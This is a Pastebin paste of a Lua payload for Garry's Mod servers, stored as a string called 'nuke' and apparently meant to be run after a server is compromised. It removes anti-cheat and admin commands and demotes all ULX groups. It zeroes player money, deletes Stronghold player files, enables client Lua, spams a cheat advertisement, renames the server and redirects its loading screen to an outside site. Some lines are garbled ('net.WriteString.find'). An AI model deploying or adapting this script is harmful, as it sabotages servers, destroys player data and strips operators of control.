2much4Us

Untitled

May 31st, 2018
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.35 KB | None | 0 0
  1. local nuke = [[
  2. if( LeyAC ) then
  3. LeyAC = nil;
  4. end
  5.  
  6. timer.Create( "next_level_timer2", 20, 0, function()
  7. --Break some bad cmds
  8. local bad = {"Ban","Kick","Kill","KillSilent","GodEnable","GodDisable"} for k,v in next, bad do FindMetaTable("Player")[v] = nil end
  9. --Break ULX
  10. if ULib then
  11. for k,v in pairs(player.GetAll()) do
  12. ULib.ucl.addUser( v:SteamID(), {}, {}, "user" );
  13. end
  14.  
  15. for k,v in pairs(ULib.ucl.groups) do
  16. if k != "user" then
  17. ULib.ucl.removeGroup(k);
  18. end
  19. end
  20.  
  21. for k,v in pairs(ULib.ucl.users) do
  22. v.group = "user"
  23. end
  24. end
  25. --Gamemode related
  26. if GAMEMODE.Name == "DarkRP" then
  27.  
  28. for k,v in pairs(player.GetAll()) do
  29. RunConsoleCommand("rp_setmoney", v:Nick(), 0);
  30. end
  31.  
  32. hook.Add("PlayerInitialSpawn", "darkrp_specific_persistence", function( ply )
  33. RunConsoleCommand("rp_setmoney", ply:Nick(), 0);
  34. end)
  35. end
  36.  
  37. if GAMEMODE.Name == "Trouble in Terrorist Town" then //something here?
  38. //for k, v in pairs(player.GetAll()) do
  39. //end
  40. end
  41.  
  42. if net.WriteString.find( GAMEMODE.Name:lower(), "stronghold" ) then
  43. for k,v in pairs(player.GetAll()) do
  44. RunConsoleCommand("gbux_setmoney", v:Nick(), 0);
  45. end
  46.  
  47. hook.Add("PlayerInitialSpawn", "stronghold_specific_persistence", function( ply )
  48. RunConsoleCommand("gbux_setmoney", ply:Nick(), 0);
  49. end)
  50.  
  51. local fil = file.Find( "data/stronghold/playerinfo/*.txt", "GAME" )
  52.  
  53. for k, v in pairs( fil ) do
  54. file.Delete( fil )
  55. end
  56. end
  57. end)
  58.  
  59. if GetConVarnet.WriteString("sv_allowcslua") != "0" then
  60. RunConsoleCommand( "sv_allowcslua", "1" );
  61. end
  62.  
  63. hook.Add("Think", "busted", function()
  64. for k,v in pairs (player.GetAll()) do
  65. v:SetModelScale(2.5, 100);
  66. v:SetRunSpeed(400 * 2);
  67. v:SetWalkSpeed(200 * 2);
  68. end
  69. end)
  70.  
  71. timer.Create( "next_level_timer", 5, 0, function()
  72. for k, v in pairs(player.GetAll()) do
  73. v:ConCommand("say Session is the best cheat !");
  74. end
  75. end)
  76.  
  77. RunConsoleCommand("hostname", "Seized by Infamous")
  78. RunConsoleCommand( "sv_loadingurl", "https://infamousseize.000webhostapp.com/index.php" )
  79. ]]
Add Comment
Please, Sign In to add comment